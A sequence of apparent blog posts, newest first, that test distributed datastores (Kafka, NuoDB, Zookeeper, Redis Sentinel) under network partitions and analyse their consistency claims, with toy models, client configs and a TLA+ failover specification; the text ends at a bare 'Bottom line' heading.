kafka-tolerance-leader-disappears.jpg
kafka-promotion.jpg
kafka-loss.jpg

Kafka’s replication design uses leaders, elected via Zookeeper. Each shard has a single leader. The leader maintains a set of in-sync-replicas: all the nodes which are up-to-date with the leader’s log, and actively acknowledging new writes. Every write goes through the leader and is propagated to every node in the In Sync Replica set, or ISR. Once all nodes in the ISR have acknowledged the request, the leader considers it committed, and can ack to the client.

When a node fails, the leader detects that writes have timed out, and removes that node from the ISR in Zookeeper. Remaining writes only have to be acknowledged by the healthy nodes still in the ISR, so we can tolerate a few failing or inaccessible nodes safely.
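A toy model of that commit rule (not Kafka's actual implementation) makes the mechanics concrete:

```python
class Leader:
    """Toy model of Kafka's ISR-based commit rule, for illustration only."""
    def __init__(self, replicas):
        self.isr = set(replicas)  # in-sync replicas, including the leader

    def committed(self, acks_from):
        # A write commits once every current ISR member has acknowledged it.
        return self.isr <= acks_from

    def drop_from_isr(self, node):
        # On timeout, the leader removes the lagging node from the ISR,
        # shrinking the set of acks needed for future commits.
        self.isr.discard(node)

l = Leader({"n1", "n2", "n3"})
assert not l.committed({"n1", "n2"})  # n3 hasn't acked yet
l.drop_from_isr("n3")
assert l.committed({"n1", "n2"})      # ISR shrank; the write now commits
l.drop_from_isr("n2")
assert l.committed({"n1"})            # ISR is just the leader itself
```

The last assertion is the crux of what follows: nothing in the rule stops the ISR from shrinking to a single node.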

So far, so good; this is about what you’d expect from a synchronous replication design. But then there’s this claim from the replication blog posts and wiki: “with f nodes, Kafka can tolerate f-1 failures”.

This is of note because most CP systems only claim tolerance to n/2-1 failures; e.g. a majority of nodes must be connected and healthy in order to continue. LinkedIn says that majority quorums are not reliable enough, in their operational experience, and that tolerating the loss of all but one node is an important aspect of the design.

Kafka attains this goal by allowing the ISR to shrink to just one node: the leader itself. In this state, the leader is acknowledging writes which have only been persisted locally. What happens if the leader then loses its Zookeeper claim?

The system cannot safely continue–but the show must go on. In this case, Kafka holds a new election and promotes any remaining node–which could be arbitrarily far behind the original leader. That node begins accepting requests and replicating them to the new ISR.

When the original leader comes back online, we have a conflict. The old leader’s log is identical to the new leader’s up to some point, after which they diverge. Two possibilities come to mind: we could preserve both writes, perhaps appending the old leader’s writes to the new–but this would violate the linear ordering property Kafka aims to preserve. Another option is to drop the old leader’s conflicting writes altogether. This means destroying committed data.
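A tiny illustration of the second option, which is the one that destroys data (the log entries here are hypothetical):

```python
# Hypothetical logs at the moment the old leader rejoins. It committed
# b, c, and d alone, after shrinking the ISR to itself:
old_leader_log = ["a", "b", "c", "d"]
new_leader_log = ["a"]          # causally disconnected from b, c, d

# To restore a single linear order, the old leader truncates to the new
# leader's log and follows it; the committed suffix simply vanishes:
lost = old_leader_log[len(new_leader_log):]
old_leader_log = list(new_leader_log)

assert lost == ["b", "c", "d"]
assert old_leader_log == new_leader_log
```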

In order to see this failure mode, two things have to happen:

  1. The ISR must shrink such that some node (the new leader) is no longer in the ISR.
  2. All nodes in the ISR must lose their Zookeeper connection.

For instance, a lossy NIC which drops some packets but not others might isolate a leader from its Kafka followers, but break the Zookeeper connection slightly later. Or the leader could be partitioned from the other Kafka nodes by a network failure, and then crash, lose power, or be restarted by an administrator. Or there could be correlated failures across multiple nodes, though this is less likely.

In short, two well-timed failures (or, depending on how you look at it, one complex failure) on a single node can cause the loss of arbitrary writes in the proposed replication system.

kafka-diagram.jpg

I want to rephrase this, because it’s a bit tricky to understand. In the causality diagram to the right, the three vertical lines represent three distinct nodes, and time flows downwards. Initially, the Leader (L) can replicate requests to its followers in the ISR. Then a partition occurs, and writes time out. The leader detects the failure and removes nodes 2 and 3 from the ISR, then acknowledges some log entries written only to itself.

When the leader loses its Zookeeper connection, the middle node becomes the new leader. What data does it have? We can trace its line upwards in time to see that it only knows about the very first write made. All other writes on the original leader are causally disconnected from the new leader. This is the reason data is lost: the causal invariant between leaders is violated by electing a new node once the ISR is empty.

I suspected this problem existed from reading the JIRA ticket, but after talking it through with Jay Kreps I wasn’t convinced I understood the system correctly. Time for an experiment!

Results

First, I should mention that Kafka has some parameters that control write consistency. The default behaves like MongoDB: writes are not replicated prior to acknowledgement, which allows for higher throughput at the cost of safety. In this test, we’ll be running in synchronous mode:

(producer/producer
  {"metadata.broker.list"     (str (:host opts) ":9092")
   "request.required.acks"    "-1" ; all in-sync brokers
   "producer.type"            "sync"
   "message.send.max_retries" "1"
   "connect.timeout.ms"       "1000"
   "retry.backoff.ms"         "1000"
   "serializer.class"         "kafka.serializer.DefaultEncoder"
   "partitioner.class"        "kafka.producer.DefaultPartitioner"})

With that out of the way, our writes should be fully acknowledged by the ISR once the client returns from a write operation successfully. We’ll enqueue a series of integers into the Kafka cluster, then isolate a leader using iptables from the other Kafka nodes. Latencies spike initially, while the leader waits for the missing nodes to respond.

A few requests may fail, but the ISR shrinks in a few seconds and writes begin to succeed again.

kafka-part.png

We’ll allow that leader to acknowledge writes independently, for a time. While these writes look fine, they’re actually only durable on a single node–and could be lost if a leader election occurs.

kafka-zombie.png

Then we totally partition the leader. ZK detects the leader’s disconnection and the remaining nodes will promote a new leader, causing data loss. Again, a brief latency spike:

kafka-recovery.png

At the end of the run, Kafka typically acknowledges 98–100% of writes. However, half of those writes (all those made during the partition) are lost.

Writes completed in 100.023 seconds
1000 total
987  acknowledged
468  survivors
520 acknowledged writes lost! (╯°□°)╯︵ ┻━┻
130 131 132 133 134 135 ... 644 645 646 647 648 649
1 unacknowledged writes found! ヽ(´ー`)ノ
(126)
0.987 ack rate
0.52684903 loss rate
0.0010131713 unacknowledged but successful rate

Discussion

Kafka’s replication claimed to be CA, but in the presence of a partition, threw away an arbitrarily large volume of committed writes. It claimed tolerance to f-1 failures, but a single node could cause catastrophe. How could we improve the algorithm?

All redundant systems have a breaking point. If you lose all N nodes in a system which writes to N nodes synchronously, it’ll lose data. If you lose 1 node in a system which writes to 1 node synchronously, that’ll lose data too. There’s a tradeoff to be made between how many nodes are required for a write, and the number of faults which cause data loss. That’s why many systems offer per-request settings for durability. But what choice is optimal, in general? If we wanted to preserve the all-nodes-in-the-ISR model, could we constrain the ISR in a way which is most highly available?

It turns out there is a maximally available number. From Peleg and Wool’s overview paper on quorum consensus:

It is shown that in a complete network the optimal availability quorum system is the majority (Maj) coterie if p < ½.

In particular, given uniformly distributed element failure probabilities smaller than ½ (which realistically describes most homogeneous clusters), the worst quorum system is the Single coterie (one failure causes unavailability), and the best quorum system is the simple Majority (provided the cohort size is small). Because Kafka keeps only a small number (on the order of 1-10) of replicas, Majority quorums are provably optimal in their availability characteristics.

You can reason about this from the extreme cases: if we allow the ISR to shrink to 1 node, the probability of a single additional failure causing data loss is high. If we require the ISR include all nodes, any node failure will make the system unavailable for writes. If we assume failures are partially independent, the probability of two simultaneous failures goes like p², which is much smaller than p. This superlinear failure probability at both ends is why bounding the ISR size in the middle has the lowest probability of failure.
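A quick numerical check of that intuition, assuming independent node failures with probability p:

```python
from math import comb

def p_at_least(k, n, p):
    """Probability that at least k of n nodes are up, each failing
    independently with probability p."""
    q = 1 - p
    return sum(comb(n, i) * q**i * p**(n - i) for i in range(k, n + 1))

n, p = 5, 0.01
single   = 1 - p                # one fixed node must be up (ISR of one)
majority = p_at_least(3, n, p)  # any 3 of 5 nodes up
all_up   = p_at_least(5, n, p)  # the entire ISR must be up

# Majority quorums beat both extremes, as Peleg and Wool prove:
assert all_up < single < majority
```

With p = 0.01, requiring all five nodes gives roughly 95% availability, a single node 99%, and a majority of five better than 99.99%.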

I made two recommendations to the Kafka team:

  1. Ensure that the ISR never goes below N/2 nodes. This reduces the probability of a single node failure causing the loss of committed writes.

  2. In the event that the ISR becomes empty, block and sound an alarm instead of silently dropping data. It’s OK to make this configurable, but as an administrator, you probably want to be aware when a datastore is about to violate one of its constraints–and make the decision yourself. It might be better to wait until an old leader can be recovered. Or perhaps the administrator would like a dump of the to-be-dropped writes which could be merged back into the new state of the cluster.
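Both recommendations amount to guards in the commit and election paths; a hypothetical sketch (function names and messages are mine, not Kafka's):

```python
def can_commit(isr_size, cluster_size):
    """Recommendation 1: refuse to ack writes once the ISR falls below a
    majority of the cluster."""
    return isr_size >= cluster_size // 2 + 1

def on_empty_isr(alarm):
    """Recommendation 2: halt and alert instead of silently promoting a
    potentially stale replica."""
    alarm("ISR empty: blocking writes pending operator intervention")
    raise RuntimeError("refusing to promote an out-of-date replica")

assert can_commit(3, 5)
assert not can_commit(2, 5)   # ISR shrank below majority: block, don't ack
```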

Finally, remember that this is pre-release software; we’re discussing a candidate design, not a finished product. Jay Kreps and I discussed the possibility of a “stronger safety” mode which does bound the ISR and halts when it becomes empty–if that mode makes it into the next release, and strong safety is important for your use case, check that it is enabled.

Remember, Jun Rao, Jay Kreps, Neha Narkhede, and the rest of the Kafka team are seasoned distributed systems experts–they’re much better at this sort of thing than I am. They’re also contending with nontrivial performance and fault-tolerance constraints at LinkedIn–and those constraints shape the design space of Kafka in ways I can’t fully understand. I trust that they’ve thought about this problem extensively, and will make the right tradeoffs for their (and hopefully everyone’s) use case. Kafka is still a phenomenal persistent messaging system, and I expect it will only get better.

The next post in the Jepsen series explores Cassandra, an AP datastore based on the Dynamo model.

Previously on Jepsen, we explored Zookeeper. Next up: Kafka.

NuoDB came to my attention through an amazing mailing list thread by the famous database engineer Jim Starkey, in which he argues that he has disproved the CAP theorem:

The CAP conjecture, I am convinced, is false and can be proven false.

The CAP conjecture has been a theoretical millstone around the neck of all ACID systems. Good riddance.

This is the first wooden stake for the heart of the noSQL movement. There are more coming.

I, and every database user on the planet, not to mention a good part of the distributed systems research community, would love to find a counterexample which disproves the CAP theorem. For that matter, I’m tremendously excited about the possibilities of causal and lattice consistency, which we know are achievable in asynchronous networks. So I was curious: what was NimbusDB (now named NuoDB) up to? How does their consistency model work?

I usually try to understand a new system by reading the documentation, scanning for words like “safety”, “order”, “serializability”, “linearizability”, “consistency”, “conflict”, and “replica”. I keep notes as I go. Here are a few excerpts from my first six hours trying to figure out NuoDB’s consistency invariants:

nuodb.png

In particular, I want to draw attention to this excerpt:

If the CAP theorem means that all surviving nodes must be able to continue processing without communication after a network failure, than NUODB is not partition resistant.

This is kind of an odd statement to make, because Gilbert and Lynch’s proof defines “availability” as “every request received by a non-failing node in the system must result in a response.” That would seem to imply that NuoDB does not satisfy CAP availability.

If partition resistance includes the possibility for a surviving subset of the chorus to sing on, then NUODB refutes the CAP theorem.

We know systems exist in which a surviving subset of nodes continue processing during a partition. They are consistent with the CAP theorem because in those systems (e.g. Zookeeper) some requests to non-failing nodes do not succeed. Claiming this “refutes the CAP theorem” is incoherent.

This isn’t getting us anywhere. To figure out how NuoDB actually behaves, we’ll need to set up a cluster and test it ourselves.

Operational notes

Setting up a NuoDB cluster turned out to be more difficult than I anticipated. For starters, there are race conditions in the cluster join process. Each node has a seed node to join to, which determines the cluster it will become a part of. If that seed is inaccessible at startup, the node will quietly become a part of a new, independent cluster–and will not, as far as I can tell, join the original cluster even if the node becomes accessible later. Consequently, performing a cold start is likely to result in several independent clusters, up to and including every node considering itself the sole node in its own cluster.

This is a catastrophic outcome: if any clients manage to connect to one of these isolated clusters, their operations will almost certainly disagree with the other clusters. You’ll see conflicting row values, broken primary keys, invalid foreign key relationships, and so on. I have no idea how you go about repairing that kind of damage without simply dropping all the writes on one side of the split-brain.

You can join a node to itself. This is easy to do accidentally if you, say, deploy the same seed node to every node’s configuration file. The consequences are… interesting.

There are also race conditions in database creation. For instance, if you create and delete the same simple table a few times in succession, you can back yourself into this corner, where you can neither use, delete, nor recreate a table, short of nuking the entire cluster:

nuodb-fail.png

I’ve talked with the NuoDB team about these bugs, and they’re working on fixing them. Hopefully they won’t be present in future releases.

Finally, be aware that restarting a crashed NuoDB node does not restore its transaction managers or storage managers; if you do a naive rolling restart, all the data vanishes. In my conversations with NuoDB’s engineering staff, it looks like this is actually intended behavior for their customers' use cases. The cluster also doesn’t set up failover replicas when nodes become unavailable, so it’s easy to accidentally lose all the storage nodes if your membership shifts. NuoDB plans to improve that behavior in future releases.

What happens during partition?

In this NuoDB test, we check the consistency of compare-and-set updates to a single cell, by having transactions compete at the SERIAL consistency level to read, update, and write a vector of numbers. Note that this test does not check multi-key linearizability, or, for that matter, exclude behaviors like P4 or P3.

During a partition, with the Java driver, you could see a variety of failure modes:

  • “Duplicate value in unique index SEQUENCES..PRIMARY_KEY”
  • End of stream reached
  • Broken pipe
  • Connection reset
  • Indefinite latency

And I do mean indefinite. I haven’t actually found an upper limit to how long NuoDB will block for. As far as I can tell, when a node is inaccessible, operations will queue up for as long as the partition lasts. Moreover, they block globally: no subset of the cluster responded during the partition, even though a fully connected majority component existed.

nuodb1.png

Perhaps because all operations are queued without timeout, it takes a long time for NuoDB latencies to recover after the partition resolves. In my tests, latencies continued to spike well into the 30-60 second range for as many as 1500 seconds after the partition ended. I haven’t found an upper limit for this behavior, but eventually, something somewhere must run out of ram.

nuodb2.png

Results

NuoDB typically acknowledged 55% of writes in my tests–most, but not all, writes made during the partition failed due to CaS conflict and were not retried after Jepsen’s internal timeout. The good news is that all acknowledged writes made at the SERIAL consistency level were present in the final dataset: no dropped writes. There were also a trivial fraction of false negatives, which is typical for most CP systems. This indicates that NUODB is capable of preserving some sort of linear order over CaS operations to a single cell, even in the presence of a partition.

Note that NuoDB isn’t fully CP, because it does not enforce serializability for all write operations–just “local transaction order”. I’m not exactly sure how the local orders interact, and whether there are practical scenarios which would violate serializability but be allowed by NuoDB’s local transaction invariants. So far I haven’t been able to construct a test to demonstrate the difference.

pushingoffforlater.jpg

Does NuoDB refute the CAP theorem? Of course it doesn’t. By deferring all operations until the partition resolves, NuoDB is not even close to available. In fact, it’s a good deal less available than more consistent systems: Zookeeper, for example, remains available on all nodes connected to a majority component. NuoDB is another example of the adage that systems which purport to be CA or CAP usually sacrifice availability or consistency when a partition does occur–and often in spectacular ways.

Blocking all writes during partition is, according to the NuoDB team, intended behavior. However, there is experimental liveness detection code in the most recent release, which will hopefully allow NuoDB to begin timing out requests to inaccessible nodes. I haven’t been able to test that code path yet, but future releases may enable it by default.

If you are considering using NuoDB, be advised that the project’s marketing and documentation may exceed its present capabilities. Try to enable the liveness detection code, and set up your own client timeouts to avoid propagating high latencies to other systems. Try to build backpressure hints into your clients to reduce the requests against NuoDB during failure; the latency storm which persists after the network recovers is proportional to the backlog of requests. Finally, be aware of the operational caveats mentioned earlier: monitor your nodes carefully, restart their storage and transaction managers as appropriate, and verify that newly started nodes have indeed joined the cluster before exposing them to clients.

Finally, I want to note (as always) that the presence of bugs does not mean that the NuoDB engineers are incompetent–in fact, I want to assert the opposite. In my discussions with the NuoDB team I’ve found them to be friendly, capable, aware of the product’s limitations, and doing their best to solve a difficult problem within constraints of time, budget, and complexity. Given time, I’m sure they’ll get past these initial hurdles. From one employee:

I only hope you’ll footnote that crazy CAP rambling with the disclaimer that no one at NuoDB today actually agrees with Jim’s comments in that thread.

In the next post, we’ll learn about Kafka 0.8’s proposed replication model.

In this Jepsen post, we’ll explore Zookeeper. Up next: NuoDB.

Zookeeper, or ZK for short, is a distributed CP datastore based on a consensus protocol called ZAB. ZAB is similar to Paxos in that it offers linearizable writes and is available whenever a majority quorum can complete a round, but unlike the Paxos papers, places a stronger emphasis on the role of a single leader in ensuring the consistency of commits.

Because Zookeeper uses majority quorums, in an ensemble of five nodes, any two can fail or be partitioned away without causing the system to halt. Any clients connected to a majority component of the cluster can continue to make progress safely. In addition, the linearizability property means that all clients will see all updates in the same order–although clients may drift behind the primary by an arbitrary duration.
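The arithmetic behind that tolerance is simple: a majority-quorum system of n nodes tolerates ⌊(n-1)/2⌋ failures.

```python
def tolerated_failures(n):
    """Failures a majority-quorum system of n nodes can survive."""
    return (n - 1) // 2

assert tolerated_failures(5) == 2  # the five-node ensemble above
assert tolerated_failures(3) == 1
# An even-sized ensemble buys nothing: the quorum grows along with it.
assert tolerated_failures(6) == 2
```

This is why ZK ensembles almost always have an odd number of nodes.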

This safety property comes at a cost: writes must be durably written to a disk log on a majority of nodes before they are acknowledged. In addition, the entire dataset must fit in memory. This means that Zookeeper is best deployed for small pieces of state where linearizability and high availability are critical. Often, ZK is used to track consistent pointers to larger, immutable data stored in a different (perhaps AP) system, combining the safety and scalability advantages of both. At the same time, this strategy reduces the availability for writes, since there are two systems to fail, and one of them (ZK) requires majority quorums.

ZNode linearizability

In this test, five clients use a Curator DistributedAtom to update a list of numbers. The list is stored as a single serialized znode, and updates are applied via a CaS loop: atomically reading, decoding, appending the appropriate number, encoding, and writing back iff the value has not changed.

(let [curator (framework (str (:host opts) ":2181") "jepsen")
      path    "/set-app"
      state   (distributed-atom curator path [])]
  (reify SetApp
    (setup [app]
      (reset!! state []))
    (add [app element]
      (try
        (swap!! state conj element)
        ok
        (catch org.apache.zookeeper.KeeperException$ConnectionLossException e
          error)))
    (results [app]
      @state)
    (teardown [app]
      (delete! curator path))))

Initially, the ZK leader is n1. During the test, we partition [n1 n2] away from [n3 n4 n5], which means the leader cannot commit to a majority of nodes–and consequently, writes immediately block:

zk1.png

After 15 seconds or so, a new leader is elected in the majority component, and writes may proceed again. However, only the clients which can see one of [n3 n4 n5] can write: clients connected to [n1 n2] time out while waiting to make contact with the leader:

zk2.png

When the partition is resolved, writes on [n1 n2] begin to succeed right away; the leader election protocol is stable, so there is no need for a second transition during recovery.

Consequently, in a short test (~200 seconds, ~70 second partition, evenly distributed constant write load across all nodes) ZK might offer 78% availability, asymptotically converging on 60% (3/5 nodes) availability as the duration of the partition lengthens. ZK has never dropped an acknowledged write in any Jepsen test. It also typically yields 0-2 false positives: likely due to writes proxied through n1 and n2 just prior to the partition, such that the write committed, but the acknowledgement was not received by the proxying node.

As with any experiment, we can only disconfirm hypotheses. This test demonstrates that in the presence of a partition and leader election, Zookeeper is able to maintain the linearizability invariant. However, there could be other failure modes or write patterns which would not preserve linearizability–I just haven’t been able to find them so far. Nonetheless, this is a positive result: one that all CP datastores should aim for.

Recommendations

Use Zookeeper. It’s mature, well-designed, and battle-tested. Because the consequences of its connection model and linearizability properties are subtle, you should, wherever possible, take advantage of tested recipes and client libraries like Curator, which do their best to correctly handle the complex state transitions associated with session and connection loss.

Also keep in mind that linearizable state in Zookeeper (such as leader election) does not guarantee the linearizability of a system which uses ZK. For instance, a cluster which uses ZK for leader election might allow multiple nodes to be the leader simultaneously. Even if there are no simultaneous leaders at the same wall-clock time, message delays can result in logical inconsistencies. Designing CP systems, even with a strong coordinator, requires carefully coupling the operations in the system to the underlying coordinator state.
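One standard defense against stale leaders is a fencing token: tag each leadership epoch with a monotonically increasing number (ZK's zxid can serve) and have the downstream resource reject writes from older epochs. A hypothetical sketch, not a ZK or Curator API:

```python
class FencedResource:
    """Rejects writes carrying a stale epoch, so a deposed leader that still
    believes it holds the lock can't clobber newer state."""
    def __init__(self):
        self.highest_epoch = 0
        self.value = None

    def write(self, epoch, value):
        if epoch < self.highest_epoch:
            return False  # stale leader: refuse the write
        self.highest_epoch = epoch
        self.value = value
        return True

r = FencedResource()
assert r.write(epoch=1, value="from old leader")
assert r.write(epoch=2, value="from new leader")
assert not r.write(epoch=1, value="late write from deposed leader")
assert r.value == "from new leader"
```

Note that this couples the resource itself to the coordinator's state, which is exactly the careful coupling the paragraph above calls for.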

Next up: NuoDB.

In response to my earlier post on Redis inconsistency, Antirez was kind enough to help clarify some points about Redis Sentinel's design.

First, I'd like to reiterate my respect for Redis. I've used Redis extensively in the past with good results. It's delightfully fast, simple to operate, and offers some of the best documentation in the field. Redis is operationally predictable. Data structures and their performance behave just how you'd expect. I hear nothing but good things about the clarity and quality of Antirez' C code. This guy knows his programming.

I think Antirez and I agree with each other, and we're both saying the same sorts of things. I'd just like to expand on some of these ideas a bit, and generalize to a broader class of systems.

First, the distributed system comprised of Redis and Redis Sentinel cannot be characterized as consistent. Nor can MongoDB with anything less than WriteConcern.MAJORITY, or MySQL with asynchronous replication, for that matter. Antirez writes:

What I'm saying here is that just the goal of the system is:

1) To promote a slave into a master if the master fails.
2) To do so in a reliable way.

Redis Sentinel does reliably promote secondaries into primaries. It is so good at this that it can promote two, three, or all of your secondaries into primaries concurrently, and keep them in that state indefinitely. As we've seen, having causally unconnected primaries in this kind of distributed system allows for conflicts–and since Redis Sentinel will destroy the state on an old primary when it becomes visible to a quorum of Sentinels, this can lead to arbitrary loss of acknowledged writes to the system.

Ok I just made clear enough that there is no such goal in Sentinel to turn N Redis instances into a distributed store,

If you use any kind of failover, your Redis system is a distributed store. Heck, reading from secondaries makes Redis a distributed store.

So you can say, ok, Sentinel has a limited scope, but could you add a feature so that when the master feels in the minority it no longer accept writes? I don't think it's a good idea. What it means to be in the minority for a Redis master monitored by Sentinels (especially given that Redis and Sentinel are completely separated systems)?

Do you want your Redis master stopping to accept writes when it is no longer able to replicate to its slaves?

Yes. This is required for a CP system with failover. If you don't do it, your system can and will lose data. You cannot achieve consistency in the face of a partition without sacrificing availability. If you want Redis to be AP, then don't destroy the data on the old primaries by demoting them. Preserve conflicts and surface them to the clients for merging.

You could do this as an application developer by setting every Redis node to be a primary, and writing a proxy layer which uses, say, consistent hashing and active anti-entropy to replicate writes between nodes. Take a look at Antirez's own experiments in this direction. If you want a CP system, you could follow Datomic's model and use immutable shared-structure values in Redis, combined with, say, Zookeeper for mutable state.

Why topology matters

Antirez recommends a different approach to placing Sentinels than I used in my Redis experiments:

… place your Sentinels and set your quorum so that you are defensive enough against partitions. This way the system will activate only when the issue is really the master node down, not a network problem. Fear data loss and partitions? Have 10 Linux boxes? Put a Sentinel in every box and set quorum to 8.

I… can't parse this statement in a way that makes sense. Adding more boxes to a distributed system doesn't reduce the probability of partitions–and more to the point, trying to determine the state of a distributed system from outside the system itself is fundamentally flawed.

I mentioned that having the nodes which determine the cluster state (the Sentinels) be separate from the nodes which actually perform the replication (the Redis servers) can lead to worse kinds of partitions. I'd like to explain a little more, because I'm concerned that people might actually be doing this in production.

In this image, S stands for Sentinel, R stands for a Redis server, and C stands for Client. A box around an R indicates that node is a primary, and where it is able to replicate data to a secondary Redis server, an arrow is shown on that path. Lines show open network connections, and the jagged border shows a network partition.

Sentinels separate from clients and servers

Let's say we place our sentinels on 3 nodes to observe a three-node cluster. In the left-hand scenario, the majority of Sentinels, along with two servers, is isolated from the clients. They promote node 2 to be a new primary, and it begins replicating to node 3. Node 1, however, is still a primary. Clients will continue writing to node 1, even though a.) its durability guarantees are greatly diminished–if it dies, all writes will be lost, and b.) the node doesn't have a quorum, so it cannot safely accept writes. When the partition resolves, the Sentinels will demote node 1 to a secondary and replace its data with the copy from N2, effectively destroying all writes during the partition.

On the right-hand side, a fully connected group of Sentinels can only see one Redis node. It's not safe to promote that node, because it doesn't have a majority and servers won't demote themselves when isolated, but the sentinels do it anyway. This scenario could be safely available to clients because a majority is present, but Redis Sentinel happily creates a split-brain and obliterates the data on the first node at some later time.

Sentinels with clients

If you take Antirez's advice and colocate the sentinels with your clients, we can still get into awful states. On the left, an uneven partition between clients and servers means we elect a minority Redis server as the primary, even though it can't replicate to any other nodes. The majority component of the servers can still accept writes, but they're doomed: when the clients are able to see those nodes again, they'll wipe out all the writes that took place on those 2 nodes.

On the right, we've got the same partition topology I demonstrated in the Redis post. Same deal: split brain means conflicting writes and throwing away data.

If you encounter intermittent or rolling partitions (which can happen in the event of congestion and network failover), shifting quorums coupled with the inability of servers to reason about their own cluster state could yield horrifying consequences, like every node being a primary at the same time. You might be able to destroy not only writes that took place during the partition, but all data ever written–not sure if the replication protocol allows this or if every node just shuts down.

Bottom line: if you're building a distributed system, you must measure connectivity in the distributed system itself, not by what you can see from the outside. Like we saw with MongoDB and Riak, it's not the wall-clock state that matters–it's the logical messages in the system. The further you get from those messages, the wider your windows for data loss.

It's not just Sentinel

I assert that any system which uses asynchronous primary-secondary replication, and can change which node is the primary, is inconsistent. Why? If you write an operation to the primary, and then failover occurs before the operation is replicated to the node which is about to become the new primary, the new primary won't have that operation. If your replication strategy is to make secondaries look like the current primary, the system isn't just inconsistent, but can actually destroy acknowledged operations.
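Before the formal model, the same scenario can be sketched in a few lines of Python. This is a toy with hypothetical names, not any real database's replication code, but it exercises exactly the failure described above: an acknowledged write lands on the primary, failover happens before replication, and the replication step then erases the write everywhere.

```python
# Toy model (hypothetical, not any database's actual protocol) of why
# asynchronous replication plus failover loses acknowledged writes.

def run(steps):
    logs = {"n1": [], "n2": []}   # per-node oplogs
    acks = []                     # operations acknowledged to the client
    primary = "n1"
    for step in steps:
        if step[0] == "write":           # async write: ack before replication
            op = step[1]
            logs[primary].append(op)
            acks.append(op)
        elif step[0] == "replicate":     # force the secondary to match the primary
            secondary = "n2" if primary == "n1" else "n1"
            logs[secondary] = list(logs[primary])
        elif step[0] == "failover":      # promote the other node
            primary = "n2" if primary == "n1" else "n1"
    # Consistent iff every acknowledged op survives, in order, on the primary
    consistent = [op for op in logs[primary] if op in acks] == acks
    return consistent, logs, acks

ok, logs, acks = run([("write", 1), ("failover",), ("replicate",)])
# The write to n1 was acknowledged, but failover happened first: n2 is now
# primary with an empty log, and replication wipes n1 too.
print(ok, logs, acks)   # False {'n1': [], 'n2': []} [1]
```

Reorder the steps so replication happens before failover and the run is consistent; the danger window is precisely the gap between acknowledgment and replication.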

Here's a formal model of a simple system which maintains a log of operations. At any stage, one of three things can happen: we can write an operation to the primary, replicate the log of the primary to the secondary, or fail over:

------------------------------ MODULE failover ------------------------------
EXTENDS Naturals, Sequences, TLC

CONSTANT Ops

\* N1 and N2 are the list of writes made against each node
VARIABLES n1, n2

\* The list of writes acknowledged to the client
VARIABLE acks

\* The current primary node
VARIABLE primary

\* The types we allow variables to take on
TypeInvariant == /\ primary \in {1, 2}
                 /\ n1 \in Seq(Ops)
                 /\ n2 \in Seq(Ops)
                 /\ acks \in Seq(Ops)

\* An operation is acknowledged if it has an index somewhere in acks.
IsAcked(op) == \E i \in DOMAIN acks : acks[i] = op

\* The system is *consistent* if every acknowledged operation appears,
\* in order, in the current primary's oplog:
Consistency == acks = SelectSeq((IF primary = 1 THEN n1 ELSE n2), IsAcked)

\* We'll say the system is *potentially consistent* if at least one node
\* has a superset of our acknowledged writes in order.
PotentialConsistency == \/ acks = SelectSeq(n1, IsAcked)
                        \/ acks = SelectSeq(n2, IsAcked)

\* To start out, all oplogs are empty, and the primary is n1.
Init == /\ primary = 1
        /\ n1 = <<>>
        /\ n2 = <<>>
        /\ acks = <<>>

\* A client can send an operation to the primary. The write is immediately
\* stored on the primary and acknowledged to the client.
Write(op) == IF primary = 1
             THEN /\ n1' = Append(n1, op)
                  /\ acks' = Append(acks, op)
                  /\ UNCHANGED <<n2, primary>>
             ELSE /\ n2' = Append(n2, op)
                  /\ acks' = Append(acks, op)
                  /\ UNCHANGED <<n1, primary>>

\* For clarity, we'll have the client issue unique writes
WriteSomething == \E op \in Ops : ~IsAcked(op) /\ Write(op)

\* The primary can *replicate* its state by forcing another node
\* into conformance with its oplog
Replicate == IF primary = 1
             THEN /\ n2' = n1
                  /\ UNCHANGED <<n1, acks, primary>>
             ELSE /\ n1' = n2
                  /\ UNCHANGED <<n2, acks, primary>>

\* Or we can fail over to a new primary.
Failover == /\ IF primary = 1 THEN primary' = 2 ELSE primary' = 1
            /\ UNCHANGED <<n1, n2, acks>>

\* At each step, we allow the system to either write, replicate, or fail over
Next == \/ WriteSomething
        \/ Replicate
        \/ Failover

This is written in the TLA+ language for describing algorithms, which encodes a good subset of ZF axiomatic set theory with first-order logic and the Temporal Logic of Actions. We can explore this specification with the TLC model checker, which takes our initial state and evolves it by executing every possible state transition until it hits an error:

Invariant Consistency is violated.

This protocol is inconsistent. The fields in red show the state changes during each transition: in the third step, the primary is n2, but n2's oplog is empty, instead of containing the list <<2>>. In fact, this model fails the PotentialConsistency invariant shortly thereafter, if replication or a write occurs. We can also test for the total loss of writes; it fails that invariant too.

That doesn't mean primary-secondary failover systems must be inconsistent. You just have to ensure that writes are replicated before they're acknowledged:

\* We can recover consistency by making the write protocol synchronous
SyncWrite(op) == /\ n1' = Append(n1, op)
                 /\ n2' = Append(n2, op)
                 /\ acks' = Append(acks, op)
                 /\ UNCHANGED primary

\* This new state transition satisfies both consistency constraints
SyncNext == \/ \E op \in Ops : SyncWrite(op)
            \/ Replicate
            \/ Failover

And in fact, we don't have to replicate to all nodes before ack to achieve consistency–we can get away with only writing to a quorum, if we're willing to use a more complex protocol like Paxos.

The important bit

So you skimmed the proof; big deal, right? The important thing is that it doesn't matter how you actually decide to do the failover: Sentinel, Mongo's gossip protocol, Heartbeat, Corosync, Byzantine Paxos, or a human being flipping the switch. Redis Sentinel happens to be more complicated than it needs to be, and it leaves much larger windows for write loss than it has to, but even if it were perfect the underlying Redis replication model is fundamentally inconsistent. We saw the same problem in MongoDB when we wrote with less than WriteConcern.MAJORITY. This affects asynchronous replication in MySQL and Postgres. It affects DRBD (yeaaaahhh, this can happen to your filesystem). If you use any of this software, you are building an asynchronous distributed system, and there are eventualities that have to be acknowledged.

Look guys, there's nothing new here. This is an old proof and many mature software projects (for instance, DRBD or RabbitMQ) explain the inconsistency and data-loss consequences of a partition in their documentation. However, not everyone knows. In fact, a good number of people seem shocked.

Why is this? I think it might be because software engineering is a really permeable field. You can start out learning Rails, and in two years wind up running four distributed databases by accident. Not everyone chose or could afford formal education, or was lucky enough to have a curmudgeonly mentor, or happened to read the right academic papers or find the right blogs. Now they might be using Redis as a lock server, or storing financial information in MongoDB. Is this dangerous? I honestly don't know. Depends on how they're using the system.

I don't view this so much as an engineering problem as a cultural one. Knives still come with sharp ends. Instruments are still hard for beginners to play. Not everything can or should be perfectly safe–or accessible. But I think we should warn people about what can happen, up front.

Tangentially: like many cultures, much of our collective understanding about what is desirable or achievable in distributed systems is driven by advertising. Yeah, MongoDB. That means you. ;-)

Bottom line

